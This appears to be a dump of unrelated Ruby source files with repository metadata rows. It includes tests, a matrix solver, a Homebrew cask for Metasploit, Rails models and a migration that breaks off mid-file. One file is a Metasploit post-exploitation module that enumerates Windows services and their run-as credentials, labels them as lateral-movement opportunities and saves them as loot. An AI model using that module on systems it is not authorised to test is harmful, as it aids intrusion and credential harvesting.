it 'returns letter c' do
expect(volume).to receive(:attach).with(server.id, '/dev/sdc')
attach_disk
end
end
context 'when there is ephemeral and swap disk' do
let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 1024, :swap => 200) }
it 'returns letter d' do
expect(volume).to receive(:attach).with(server.id, '/dev/sdd')
attach_disk
end
end
context 'when there is ephemeral, swap disk and config drive is disk' do
let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 1024, :swap => 200) }
let(:cloud_options) do
cloud_options = mock_cloud_options
cloud_options['properties']['openstack']['config_drive'] = 'disk'
cloud_options
end
it 'returns letter e' do
expect(volume).to receive(:attach).with(server.id, '/dev/sde')
attach_disk
end
end
context 'when server flavor is not found' do
let(:flavor) { nil }
it 'returns letter b' do
expect(volume).to receive(:attach).with(server.id, '/dev/sdb')
attach_disk
end
end
end
end
| 33.298969 | 105 | 0.61548 |
f746284063676e767aa6794fb5a6f11955d6992b | 1,457 | require('matrix')
class Cramer
def self.solution1(row1, known_term)
matrix = Matrix.rows([row1])
determinant = matrix.determinant
if determinant.zero?
raise ArgumentError.new('The determinant is zero!')
end
x1 = Rational(
Matrix.columns([known_term]).determinant,
determinant
)
[x1]
end
def self.solution2(row1, row2, known_term)
matrix = Matrix.rows([row1, row2])
determinant = matrix.determinant
if determinant.zero?
raise ArgumentError.new('The determinant is zero!')
end
x1 = Rational(
Matrix.columns([known_term, matrix.column(1)]).determinant,
determinant
)
x2 = Rational(
Matrix.columns([matrix.column(0), known_term]).determinant,
determinant
)
[x1, x2]
end
def self.solution3(row1, row2, row3, known_term)
matrix = Matrix.rows([row1, row2, row3])
determinant = matrix.determinant
if determinant.zero?
raise ArgumentError.new('The determinant is zero!')
end
x1 = Rational(
Matrix.columns([known_term, matrix.column(1), matrix.column(2)]).determinant,
determinant
)
x2 = Rational(
Matrix.columns([matrix.column(0), known_term, matrix.column(2)]).determinant,
determinant
)
x3 = Rational(
Matrix.columns([matrix.column(0), matrix.column(1), known_term]).determinant,
determinant
)
[x1, x2, x3]
end
end | 21.746269 | 85 | 0.633493 |
0136702d7b840b6a1ad4d69696bb5a4b726df464 | 1,411 | cask 'metasploit' do
version '4.17.0+20180709104409'
sha256 '6cf63efd2cd51c58f5bb444ed2c52c0d0ec6a782a32a1b7c8e24773c2e844e6f'
url "https://osx.metasploit.com/metasploit-framework-#{version}-1rapid7-1.pkg"
appcast 'https://osx.metasploit.com/LATEST'
name 'Metasploit Framework'
homepage 'https://www.metasploit.com/'
gpg "#{url}.asc", key_id: '2007B954'
depends_on formula: 'nmap'
pkg "metasploit-framework-#{version.gsub('+', ' ')}-1rapid7-1.pkg"
binary '/opt/metasploit-framework/bin/metasploit-aggregator'
binary '/opt/metasploit-framework/bin/msfbinscan'
binary '/opt/metasploit-framework/bin/msfconsole'
binary '/opt/metasploit-framework/bin/msfd'
binary '/opt/metasploit-framework/bin/msfdb'
binary '/opt/metasploit-framework/bin/msfelfscan'
binary '/opt/metasploit-framework/bin/msfmachscan'
binary '/opt/metasploit-framework/bin/msfpescan'
binary '/opt/metasploit-framework/bin/msfrop'
binary '/opt/metasploit-framework/bin/msfrpc'
binary '/opt/metasploit-framework/bin/msfrpcd'
binary '/opt/metasploit-framework/bin/msfupdate'
binary '/opt/metasploit-framework/bin/msfvenom'
uninstall script: {
executable: '/opt/metasploit-framework/bin/msfremove',
input: ['y'],
sudo: true,
},
rmdir: '/opt/metasploit-framework'
zap trash: '~/.msf4'
end
| 38.135135 | 80 | 0.693834 |
26a22c8e5feda87003a9770712269c55d7d4c8f1 | 280 | # frozen_string_literal: true
begin
require 'rspec/core/rake_task'
RSpec::Core::RakeTask.new('spec:postgres'.freeze) do |t|
t.rspec_opts = '--tag postgres'.freeze
end
# rubocop:disable Lint/HandleExceptions
rescue LoadError
# rubocop:enable Lint/HandleExceptions
end
| 23.333333 | 58 | 0.757143 |
7ae9e377a60759b200de6a9290c4cb60c67913db | 1,731 | $:.push File.expand_path('../lib', __FILE__)
require 'daylight/version'
Gem::Specification.new do |s|
s.name = 'daylight'
s.version = Daylight::VERSION
s.platform = Gem::Platform::RUBY
s.license = 'Apache-2.0'
s.authors = ['Reid MacDonald', 'Doug McInnes']
s.email = ['[email protected]', '[email protected]']
s.homepage = 'https://github.com/att-cloud/daylight'
s.summary = "Allow ActiveResource to function more like ActiveRecord"
s.description = <<-DESC
Daylight extends Rails on the server and ActiveResource in the client to
allow your ActiveResource client API to perform more like to ActiveRecord
DESC
s.add_runtime_dependency 'activeresource', '~> 4.0.0'
s.add_runtime_dependency 'haml', '~> 4.0.5'
s.add_runtime_dependency 'actionpack-page_caching', '~> 1.0.2'
s.add_runtime_dependency 'hanna-bootstrap', '~> 0.0.5'
s.add_runtime_dependency 'active_model_serializers', '~> 0.8.2'
s.add_development_dependency 'rspec'
s.add_development_dependency 'rspec-rails', '~> 2.14.0'
s.add_development_dependency 'simplecov-rcov', '~> 0.2.3'
s.add_development_dependency 'webmock', '~> 1.18.0'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'factory_girl'
s.add_development_dependency 'faker'
s.add_development_dependency 'rake'
s.files = `git ls-files -- {app,config,lib,rails}/*`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.extra_rdoc_files = `git ls-files -- **/*.md`.split("\n") + %w[README.md]
s.require_paths = ['lib']
end
| 44.384615 | 86 | 0.659157 |
ac61c3737f3c5f4a5950317317ca8a6e55f57f90 | 4,322 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Services
def initialize(info={})
super(update_info(info,
'Name' => "Windows Gather Service Info Enumeration",
'Description' => %q{
This module will query the system for services and display name and
configuration info for each returned service. It allows you to
optionally search the credentials, path, or start type for a string
and only return the results that match. These query operations are
cumulative and if no query strings are specified, it just returns all
services. NOTE: If the script hangs, windows firewall is most likely
on and you did not migrate to a safe process (explorer.exe for
example).
},
'License' => MSF_LICENSE,
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Keith Faber', 'Kx499']
))
register_options(
[
OptString.new('CRED', [ false, 'String to search credentials for' ]),
OptString.new('PATH', [ false, 'String to search path for' ]),
OptEnum.new('TYPE', [true, 'Service startup Option', 'All', ['All', 'Auto', 'Manual', 'Disabled' ]])
], self.class)
end
def run
# set vars
credentialCount = {}
qcred = datastore["CRED"] || nil
qpath = datastore["PATH"] || nil
if datastore["TYPE"] == "All"
qtype = nil
else
qtype = datastore["TYPE"].downcase
end
if qcred
qcred = qcred.downcase
print_status("Credential Filter: #{qcred}")
end
if qpath
qpath = qpath.downcase
print_status("Executable Path Filter: #{qpath}")
end
if qtype
print_status("Start Type Filter: #{qtype}")
end
results_table = Rex::Text::Table.new(
'Header' => 'Services',
'Indent' => 1,
'SortIndex' => 0,
'Columns' => ['Name', 'Credentials', 'Command', 'Startup']
)
print_status("Listing Service Info for matching services, please wait...")
service_list.each do |srv|
srv_conf = {}
# make sure we got a service name
if srv[:name]
begin
srv_conf = service_info(srv[:name])
if srv_conf[:startname]
# filter service based on filters passed, the are cumulative
if qcred && !srv_conf[:startname].downcase.include?(qcred)
next
end
if qpath && !srv_conf[:path].downcase.include?(qpath)
next
end
# There may not be a 'Startup', need to check nil
if qtype && !(START_TYPE[srv_conf[:starttype]] || '').downcase.include?(qtype)
next
end
# count the occurance of specific credentials services are running as
serviceCred = srv_conf[:startname].upcase
unless serviceCred.empty?
if credentialCount.has_key?(serviceCred)
credentialCount[serviceCred] += 1
else
credentialCount[serviceCred] = 1
# let the user know a new service account has been detected for possible lateral
# movement opportunities
print_good("New service credential detected: #{srv[:name]} is running as '#{srv_conf[:startname]}'")
end
end
results_table << [srv[:name],
srv_conf[:startname],
START_TYPE[srv_conf[:starttype]],
srv_conf[:path]]
end
rescue RuntimeError => e
print_error("An error occurred enumerating service: #{srv[:name]}: #{e}")
end
else
print_error("Problem enumerating service - no service name found")
end
end
print_line results_table.to_s
# store loot on completion of collection
p = store_loot("windows.services", "text/plain", session, results_table.to_s, "windows_services.txt", "Windows Services")
print_good("Loot file stored in: #{p.to_s}")
end
end
| 32.496241 | 125 | 0.578436 |
330ad0c6eabf0395d6e411371cc099cfa865f1ea | 1,155 | module Restfulie
module Common
module Representation
module Atom
class Person < XML
def initialize(node_type, options_or_obj)
if options_or_obj.kind_of?(Hash)
@doc = Nokogiri::XML::Document.new()
node = @doc.create_element(node_type)
node.add_namespace_definition(nil, "http://www.w3.org/2005/Atom")
node.parent = @doc
super(node)
options_or_obj.each do |key,value|
self.send("#{key}=".to_sym, value)
end
else
super(options_or_obj)
end
end
def name
text("name")
end
def name=(value)
set_text("name", value)
end
def uri
text("uri")
end
def uri=(value)
set_text("uri", value)
end
def email
text("email")
end
def email=(value)
set_text("email", value)
end
end
end
end
end
end
| 23.571429 | 79 | 0.440693 |
abfc041562bdeb2c37326391299d0f2ac586b3d3 | 147 | module Taka
module DOM
module HTML
module UListElement
def type
self['type']
end
end
end
end
end
| 12.25 | 25 | 0.52381 |
26321e4dec6a14e2f3be4d55c0eb5d14d94f6e9e | 553 | # frozen_string_literal: true
require 'spec_helper'
# Before running this spec again, you need to set environment variable BOLETOSIMPLES_ACCESS_TOKEN
RSpec.describe BoletoSimples::BankBilletPayment do
before do
BoletoSimples.configure do |c|
c.application_id = nil
c.application_secret = nil
end
end
describe 'all', vcr: { cassette_name: 'resources/bank_billet_payment/all' } do
subject { BoletoSimples::BankBilletPayment.all }
it { expect(subject.first).to be_a_kind_of(BoletoSimples::BankBilletPayment) }
end
end
| 30.722222 | 97 | 0.759494 |
210effdb128f4f462336bc263b11a07a27c1a53c | 791 | require 'fetchers/base_list_fetcher'
module VCAP::CloudController
class AppUsageEventListFetcher < BaseListFetcher
class << self
def fetch_all(message, dataset)
filter(message, dataset)
end
private
def filter(message, dataset)
if message.requested?(:after_guid)
last_event = dataset.first(guid: message.after_guid[0])
invalid_after_guid! unless last_event
dataset = dataset.filter { id > last_event.id }
end
super(message, dataset, AppUsageEvent)
end
def invalid_after_guid!
raise CloudController::Errors::ApiError.new_from_details(
'UnprocessableEntity',
'After guid filter must be a valid app usage event guid.',
)
end
end
end
end
| 24.71875 | 68 | 0.648546 |
1a17cfeb8e73e67d3339580961c96d4ca36e7864 | 707 | #!/usr/bin/env ruby -w
require 'rmagick'
img = Magick::Image.read('images/Flower_Hat.jpg').first
# Make a watermark from the word "RMagick"
mark = Magick::Image.new(140, 40) {self.background_color = 'none'}
gc = Magick::Draw.new
gc.annotate(mark, 0, 0, 0, -5, 'RMagick') do
gc.gravity = Magick::CenterGravity
gc.pointsize = 32
if RUBY_PLATFORM =~ /mswin32/
gc.font_family = 'Georgia'
else
gc.font_family = 'Times'
end
gc.fill = 'white'
gc.stroke = 'none'
end
mark = mark.wave(2.5, 70).rotate(-90)
# Composite the watermark in the lower right (southeast) corner.
img2 = img.watermark(mark, 0.25, 0, Magick::SouthEastGravity)
img2.write('watermark.jpg')
| 25.25 | 67 | 0.660537 |
1ca24ff299ad7ce4acdd2e40dfd574a955799c4c | 633 | require 'drb'
CLIENTS_COUNT = 5
TASKS_COUNT = 100000
DRb.start_service
clients = []
CLIENTS_COUNT.times do |i|
clients << DRbObject.new(nil, "druby://127.0.0.1:111#{i}")
end
puts "start with clients #{clients.size}"
$res = 0
$res_count = 0
$mutex = Mutex.new
tm = Time.now
clients.map do |cl|
Thread.new do
data = 0
loop do
data = cl.task(data)
$mutex.synchronize do
$res_count += 1
$res += data
if $res_count >= TASKS_COUNT
puts "executed with #{Time.now - tm}, res: #{$res}, res_count: #{$res_count}"
exit
end
end
end
end
end.each &:join
| 18.085714 | 87 | 0.592417 |
1a4dcdfaebf912d7033b3de419471a0a9dd555b2 | 84 | Rails.application.routes.draw do
mount Marketplace::Engine => "/marketplace"
end
| 16.8 | 45 | 0.761905 |
6a57caa670f99a1581a2142743873a0bcd28d232 | 41 | module Whodunnit
VERSION = "0.0.5"
end
| 10.25 | 19 | 0.682927 |
f868f57c5daf7c9da57f5944b07f1ad05c6e23a7 | 3,003 | # == Schema Information
#
# Table name: requests
#
# id :bigint not null, primary key
# comments :text
# request_items :jsonb
# status :integer default("pending")
# created_at :datetime not null
# updated_at :datetime not null
# distribution_id :integer
# organization_id :bigint
# partner_id :bigint
#
class Request < ApplicationRecord
include Exportable
class MismatchedItemIdsError < StandardError; end
belongs_to :partner
belongs_to :organization
belongs_to :distribution, optional: true
enum status: { pending: 0, started: 1, fulfilled: 2 }, _prefix: true
before_save :sanitize_items_data
include Filterable
# add request item scope to allow filtering distributions by request item
scope :by_request_item_id, ->(item_id) { where("request_items @> :with_item_id ", with_item_id: [{ item_id: item_id.to_i }].to_json) }
# partner scope to allow filtering by partner
scope :by_partner, ->(partner_id) { where(partner_id: partner_id) }
# status scope to allow filtering by status
scope :by_status, ->(status) { where(status: status) }
scope :during, ->(range) { where(created_at: range) }
scope :for_csv_export, ->(organization, *) {
where(organization: organization)
.includes(:partner)
.order(created_at: :desc)
}
def family_request_reply
{
"organization_id": organization_id,
"partner_id": partner_id,
"requested_items": request_items.map do |item|
{
"item_id": item['item_id'],
"count": item['quantity'],
"item_name": item['name']
}
end
}
end
# TODO: Add permission checks for request creation and item lookup
def self.parse_family_request(family_request)
request = Request.new(organization_id: family_request['organization_id'], partner_id: family_request['partner_id'])
requested_items = family_request['requested_items'].sort_by { |item| item['item_id'] }
request.request_items =
Item.where(id: requested_items.map { |item| item['item_id'] })
.order(:id).each.with_index.with_object([]) do |(item, index), request_items|
unless requested_items[index]['item_id'] == item.id
raise MismatchedItemIdsError,
'Item ids should match existing Diaper Base item ids.'
end
request_items << {
item_id: item.id,
quantity: item.default_quantity * requested_items[index]['person_count'],
name: item.name
}
end
request
end
def self.csv_export(requests)
Exports::ExportRequestService.new(requests).call
end
def total_items
request_items.sum { |item| item["quantity"] }
end
private
def sanitize_items_data
return unless request_items && request_items_changed?
self.request_items = request_items.map do |item|
item.merge("item_id" => item["item_id"]&.to_i, "quantity" => item["quantity"]&.to_i)
end
end
end
| 31.28125 | 136 | 0.663337 |
b9cb62332eb26b19f14798b179ca15d55a610ff4 | 177 | module GovukContentModels
module ActionProcessors
class ApproveReviewProcessor < BaseProcessor
def process?
requester_different?
end
end
end
end
| 17.7 | 48 | 0.717514 |
e8b81c5e1694c2eec6a86e064b44737425877b5d | 504 | module Driving
class SwitchingLanes
include SimpleIterator
attr_accessor :how
def initialize
@how = [
"When switching lanes it is important to remember the order of operations.",
"First, signal in the direction you would like to move.",
"Next, check your rear view mirror, then the mirror in the direction you are moving, then your blind spot, finally execute the lane switch.",
"Turn off the indicator."
]
@index = -1
end
end
end
| 28 | 150 | 0.660714 |
0893cd5a8da358cc47b3f974d1fd99627fecfdbd | 1,382 | # -*- coding: utf-8 -*-
require 'helper'
class TestRegressionChartScatter02 < Test::Unit::TestCase
def setup
setup_dir_var
end
def teardown
File.delete(@xlsx) if File.exist?(@xlsx)
end
def test_chart_scatter02
@xlsx = 'chart_scatter02.xlsx'
workbook = WriteXLSX.new(@xlsx)
worksheet = workbook.add_worksheet
chart = workbook.add_chart(
:type => 'scatter',
:embedded => 1,
:subtype => 'straight_with_markers'
)
# For testing, copy the randomly generated axis ids in the target xlsx file.
chart.instance_variable_set(:@axis_ids, [54514816, 45705856])
data = [
[ 1, 2, 3, 4, 5 ],
[ 2, 4, 6, 8, 10 ],
[ 3, 6, 9, 12, 15 ]
]
worksheet.write('A1', data)
chart.add_series(
:categories => '=Sheet1!$A$1:$A$5',
:values => '=Sheet1!$B$1:$B$5'
)
chart.add_series(
:categories => '=Sheet1!$A$1:$A$5',
:values => '=Sheet1!$C$1:$C$5'
)
worksheet.insert_chart('E9', chart)
workbook.close
compare_xlsx_for_regression(File.join(@regression_output, @xlsx), @xlsx)
end
end
| 27.64 | 80 | 0.484805 |
4aedd89d39ed15f60a8ac4eb14a2a28187298a1b | 1,041 | # Stolen from Technoweenie's restful_authentication
Rails::Generator::Commands::Create.class_eval do
def route_resource(*resources)
resource_list = resources.map { |r| r.to_sym.inspect }.join(', ')
sentinel = 'ActionController::Routing::Routes.draw do |map|'
logger.route "map.resource #{resource_list}"
unless options[:pretend]
gsub_file 'config/routes.rb', /(#{Regexp.escape(sentinel)})/mi do |match|
"#{match}\n map.resource #{resource_list}\n"
end
end
end
end
Rails::Generator::Commands::Destroy.class_eval do
def route_resource(*resources)
resource_list = resources.map { |r| r.to_sym.inspect }.join(', ')
look_for = "\n map.resource #{resource_list}\n"
logger.route "map.resource #{resource_list}"
gsub_file 'config/routes.rb', /(#{look_for})/mi, ''
end
end
Rails::Generator::Commands::List.class_eval do
def route_resource(*resources)
resource_list = resources.map { |r| r.to_sym.inspect }.join(', ')
logger.route "map.resource #{resource_list}"
end
end | 34.7 | 79 | 0.690682 |
7a5e33c61babca3e3a19eb6e3d9612859ec25bba | 1,621 | # frozen_string_literal: true
module Ci
class RetryBuildService < ::BaseService
CLONE_ACCESSORS = %i[pipeline project ref tag options name
allow_failure stage stage_id stage_idx trigger_request
yaml_variables when environment coverage_regex
description tag_list protected needs].freeze
def execute(build)
reprocess!(build).tap do |new_build|
build.pipeline.mark_as_processable_after_stage(build.stage_idx)
new_build.enqueue!
MergeRequests::AddTodoWhenBuildFailsService
.new(project, current_user)
.close(new_build)
end
end
# rubocop: disable CodeReuse/ActiveRecord
def reprocess!(build)
unless can?(current_user, :update_build, build)
raise Gitlab::Access::AccessDeniedError
end
attributes = CLONE_ACCESSORS.map do |attribute|
[attribute, build.public_send(attribute)] # rubocop:disable GitlabSecurity/PublicSend
end
attributes.push([:user, current_user])
build.retried = true
Ci::Build.transaction do
# mark all other builds of that name as retried
build.pipeline.builds.latest
.where(name: build.name)
.update_all(retried: true)
create_build!(attributes)
end
end
# rubocop: enable CodeReuse/ActiveRecord
private
def create_build!(attributes)
build = project.builds.new(Hash[attributes])
build.deployment = ::Gitlab::Ci::Pipeline::Seed::Deployment.new(build).to_resource
build.save!
build
end
end
end
| 28.438596 | 93 | 0.660086 |
1ce5abb5e6631379a5d6ef3407db327296371aa9 | 608 | cask "tortoisehg" do
version "5.9.3"
sha256 "af0a8fe6cfa41e37e67fa08e0a36eabed20863090f7c266688ff93d6c9d29f9a"
url "https://www.mercurial-scm.org/release/tortoisehg/macos/TortoiseHg-#{version}-mac-x64-qt5.dmg",
verified: "mercurial-scm.org/release/tortoisehg/"
name "TortoiseHg"
desc "Tools for the Mercurial distributed revision control system"
homepage "https://tortoisehg.bitbucket.io/"
livecheck do
url "https://www.mercurial-scm.org/release/tortoisehg/macos/"
strategy :page_match
regex(/TortoiseHg-(\d+(?:\.\d+)*)-mac-x64-qt5\.dmg/i)
end
app "TortoiseHg.app"
end
| 32 | 101 | 0.733553 |
3385565b348aee474420d1feb02b40df53b9079e | 3,554 | module RailsAdmin
module Config
module Actions
Edit.class_eval do
def self.loading_member
Thread.current[:cenit_pins_off] = true
yield
ensure
Thread.current[:cenit_pins_off] = nil
end
register_instance_option :controller do
proc do
if request.get? # EDIT
if @model_config.asynchronous_persistence
flash[:warning] = "When you save the operation will occurs asynchronous"
end
respond_to do |format|
format.html { render @action.template_name }
format.js { render @action.template_name, layout: false }
end
elsif request.put? # UPDATE
sanitize_params_for!(action = (request.xhr? ? :modal : :update))
@object.set_attributes(form_attributes = params[@abstract_model.param_key])
#Patch
if (synchronized_fields = @model_config.with(object: @object).try(:form_synchronized))
params_to_check = {}
model_config.send(action).with(controller: self, view: view_context, object: @object).fields.each do |field|
if synchronized_fields.include?(field.name.to_sym)
params_to_check[field.name.to_sym] = (field.is_a?(RailsAdmin::Config::Fields::Association) ? field.method_name : field.name).to_s
end
end
params_to_check.each do |field, param|
@object.send("#{field}=", nil) unless form_attributes[param].present?
end
end
@authorization_adapter && @authorization_adapter.attributes_for(:update, @abstract_model).each do |name, value|
@object.send("#{name}=", value)
end
changes = @object.changes
#Patch
save_options = {}
if (model = @abstract_model.model).is_a?(Class) && model < FieldsInspection
save_options[:inspect_fields] = Account.current.nil? || !::User.current_super_admin?
end
ok =
begin
if @model_config.asynchronous_persistence
do_flash_process_result ::Setup::AsynchronousPersistence.process(
model_name: @abstract_model.model_name,
id: @object.id,
attributes: @object.attributes,
options: save_options
)
true
else
@object.save(save_options)
end
rescue Exception => ex
@object.errors.add(:base, "Error while updating: #{ex.message}")
false
end
if ok
if (warnings = @object.try(:warnings)).present?
do_flash(:warning, 'Warning', warnings)
end
@auditing_adapter && @auditing_adapter.update_object(@object, @abstract_model, _current_user, changes)
respond_to do |format|
format.html { redirect_to_on_success(skip_flash: @model_config.asynchronous_persistence) }
format.js { render json: { id: @object.id.to_s, label: @model_config.with(object: @object).object_label } }
end
else
handle_save_error :edit
end
end
end
end
end
end
end
end
| 39.488889 | 149 | 0.535734 |
6298344c7b5e6c5914994619bdb1a3d1d723156c | 118 | require 'json_to_csv/version'
require 'json_to_csv/convert'
module JsonToCsv
class Error < StandardError; end
end
| 14.75 | 34 | 0.79661 |
1d7874c0dfc6a9cb799e0f7a16e1d7f60a336503 | 152 | class QuestionPolicy < InstrumentPolicy
attr_reader :user, :record
def initialize(user, record)
@user = user
@record = record
end
end | 16.888889 | 40 | 0.690789 |
18044a5e98e383a320f2b4a64c0f0494475b728c | 3,774 | Template_stservice = <<-EOS
EOS
# #ifndef INCLUDED_MBED
# #include "mbed.h"
# #endif
# #ifndef INCLUDED_BLEDEVICE
# #include "BLEDevice.h"
# #endif
# /*
# * Power control service
# * Service_Uuid: 0xFF00
# */
# static const uint16_t power_control_char_uuid = 0xFF00;
# uint8_t power_control_char_value[8] = {0,};
# GattCharacteristic PowerControlChar(
# power_control_char_uuid,
# power_control_char_value,
# sizeof(power_control_char_value),
# sizeof(power_control_char_value),
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ |
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_WRITE
# );
# static const uint16_t power_state_char_uuid = 0xFF01;
# uint8_t power_state_char_value[8] = {0x41,0x42,0x43};
# GattCharacteristic PowerStateChar(
# power_state_char_uuid,
# power_state_char_value,
# sizeof(power_control_char_value),
# sizeof(power_control_char_value),
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ
# );
# GattCharacteristic *PowerControlChars[] = { &PowerControlChar, &PowerStateChar };
# static const uint8_t power_control_service_uuid[] = {
# 0x7d, 0x2e, 0x51, 0xcd,
# 0x5a, 0xa0,
# 0x4f, 0x45,
# 0x84, 0xcf,
# 0xad, 0x3d, 0xbd, 0xf2, 0x54, 0x40
# };
# GattService PowerControlService(
# power_control_service_uuid,
# PowerControlChars,
# sizeof(PowerControlChars) / sizeof(GattCharacteristic *)
# );
# /**
# * 2nd Service
# */
# static const uint16_t energy_monitor_char_uuid = 0xFF01;
# uint8_t energy_monitor_char_value[8] = {0,};
# GattCharacteristic EnergyMonitorChar(
# energy_monitor_char_uuid,
# energy_monitor_char_value,
# sizeof(energy_monitor_char_value),
# sizeof(energy_monitor_char_value),
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ
# );
# GattCharacteristic *EnergyChars[] = { &EnergyMonitorChar };
# static const uint8_t energy_service_uuid[] = {
# 0x7d, 0x2e, 0x51, 0xcd,
# 0x5a, 0xa0,
# 0x4f, 0x45,
# 0x84, 0xcf,
# 0xad, 0x3d, 0xbd, 0xf2, 0x54, 0x41
# };
# GattService EnergyService(
# energy_service_uuid,
# EnergyChars,
# sizeof(EnergyChars) / sizeof(GattCharacteristic *)
# );
# /**
# * Time Count Service
# */
# static const uint16_t time_monitor_char_uuid = 0xFF01;
# uint8_t time_monitor_char_value[8] = {0,};
# GattCharacteristic TimeMonitorChar(
# time_monitor_char_uuid,
# time_monitor_char_value,
# sizeof(time_monitor_char_value),
# sizeof(time_monitor_char_value),
# //GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_NOTIFY
# );
# GattCharacteristic *TimeChars[] = { &TimeMonitorChar };
# static const uint8_t time_service_uuid[] = {
# 0x7d, 0x2e, 0x51, 0xcd,
# 0x5a, 0xa0,
# 0x4f, 0x45,
# 0x84, 0xcf,
# 0xad, 0x3d, 0xbd, 0xf2, 0x54, 0x42
# };
# GattService TimeService(
# time_service_uuid,
# TimeChars,
# sizeof(TimeChars) / sizeof(GattCharacteristic *)
# );
# GattService *GattServices[] = {
# &EnergyService,
# &PowerControlService,
# &TimeService };
| 31.714286 | 90 | 0.575517 |
3811c99194a7a5eeb901e9d42eab709864c0fd97 | 9,186 | require 'sequel_postgresql_triggers'
Sequel.migration do
up do
extension :pg_triggers
# RIPENESS CODES
# -----------------------------------
create_table(:ripeness_codes, ignore_index_errors: true) do
primary_key :id
String :ripeness_code, null: false, unique: true
String :description
String :legacy_code
DateTime :created_at, null: false
DateTime :updated_at, null: false
end
pgt_created_at(:ripeness_codes,
:created_at,
function_name: :pgt_ripeness_codes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:ripeness_codes,
:updated_at,
function_name: :pgt_ripeness_codes_set_updated_at,
trigger_name: :set_updated_at)
# Log changes to this table. Exclude changes to the updated_at column.
run "SELECT audit.audit_table('ripeness_codes', true, true, '{updated_at}'::text[]);"
# RMT CLASSIFICATION TYPES
# -----------------------------------
create_table(:rmt_classification_types, ignore_index_errors: true) do
primary_key :id
String :rmt_classification_type_code, null: false, unique: true
String :description
TrueClass :required_for_delivery, default: false
TrueClass :physical_attribute, default: false
DateTime :created_at, null: false
DateTime :updated_at, null: false
end
pgt_created_at(:rmt_classification_types,
:created_at,
function_name: :pgt_rmt_classification_types_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:rmt_classification_types,
:updated_at,
function_name: :pgt_rmt_classification_types_set_updated_at,
trigger_name: :set_updated_at)
# Log changes to this table. Exclude changes to the updated_at column.
run "SELECT audit.audit_table('rmt_classification_types', true, true, '{updated_at}'::text[]);"
# RMT VARIANTS
# -----------------------------------
create_table(:rmt_variants, ignore_index_errors: true) do
primary_key :id
foreign_key :cultivar_id, :cultivars, null: false
String :rmt_variant_code, null: false, unique: true
String :description
DateTime :created_at, null: false
DateTime :updated_at, null: false
end
pgt_created_at(:rmt_variants,
:created_at,
function_name: :pgt_rmt_variants_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:rmt_variants,
:updated_at,
function_name: :pgt_rmt_variants_set_updated_at,
trigger_name: :set_updated_at)
# Log changes to this table. Exclude changes to the updated_at column.
run "SELECT audit.audit_table('rmt_variants', true, true, '{updated_at}'::text[]);"
# RMT HANDLING REGIMES
# -----------------------------------
create_table(:rmt_handling_regimes, ignore_index_errors: true) do
primary_key :id
String :regime_code, null: false, unique: true
String :description
TrueClass :for_packing, default: false
DateTime :created_at, null: false
DateTime :updated_at, null: false
end
pgt_created_at(:rmt_handling_regimes,
:created_at,
function_name: :pgt_rmt_handling_regimes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:rmt_handling_regimes,
:updated_at,
function_name: :pgt_rmt_handling_regimes_set_updated_at,
trigger_name: :set_updated_at)
# Log changes to this table. Exclude changes to the updated_at column.
run "SELECT audit.audit_table('rmt_handling_regimes', true, true, '{updated_at}'::text[]);"
# RMT CLASSIFICATIONS
# -----------------------------------
create_table(:rmt_classifications, ignore_index_errors: true) do
primary_key :id
foreign_key :rmt_classification_type_id, :rmt_classification_types, type: :integer, null: false
String :rmt_classification, null: false, unique: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
end
pgt_created_at(:rmt_classifications,
:created_at,
function_name: :pgt_rmt_classifications_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:rmt_classifications,
:updated_at,
function_name: :pgt_rmt_classifications_set_updated_at,
trigger_name: :set_updated_at)
# Log changes to this table. Exclude changes to the updated_at column.
run "SELECT audit.audit_table('rmt_classifications', true, true, '{updated_at}'::text[]);"
# RMT CODES
# -----------------------------------
create_table(:rmt_codes, ignore_index_errors: true) do
primary_key :id
foreign_key :rmt_variant_id, :rmt_variants, null: false
foreign_key :rmt_handling_regime_id, :rmt_handling_regimes, null: false
String :rmt_code, null: false, unique: true
String :description
DateTime :created_at, null: false
DateTime :updated_at, null: false
end
pgt_created_at(:rmt_codes,
:created_at,
function_name: :pgt_rmt_codes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:rmt_codes,
:updated_at,
function_name: :pgt_rmt_codes_set_updated_at,
trigger_name: :set_updated_at)
# Log changes to this table. Exclude changes to the updated_at column.
run "SELECT audit.audit_table('rmt_codes', true, true, '{updated_at}'::text[]);"
# RMT DELIVERIES
# -----------------------------------
alter_table(:rmt_deliveries) do
add_foreign_key :rmt_code_id , :rmt_codes
add_column :rmt_classifications, 'int[]'
add_column :rmt_treatments, 'int[]'
end
# RMT BINS
# -----------------------------------
alter_table(:rmt_bins) do
add_foreign_key :rmt_code_id , :rmt_codes
add_foreign_key :main_ripeness_treatment_id , :treatments
add_foreign_key :main_cold_treatment_id , :treatments
add_column :rmt_classifications, 'int[]'
add_column :rmt_treatments, 'int[]'
end
end
down do
# RMT BINS
alter_table(:rmt_bins) do
drop_column :rmt_code_id
drop_column :main_ripeness_treatment_id
drop_column :rmt_classifications
drop_column :rmt_treatments
end
# RMT DELIVERIES
alter_table(:rmt_deliveries) do
drop_column :rmt_code_id
drop_column :rmt_classifications
drop_column :rmt_treatments
end
# RMT CODES
drop_trigger(:rmt_codes, :audit_trigger_row)
drop_trigger(:rmt_codes, :audit_trigger_stm)
drop_trigger(:rmt_codes, :set_created_at)
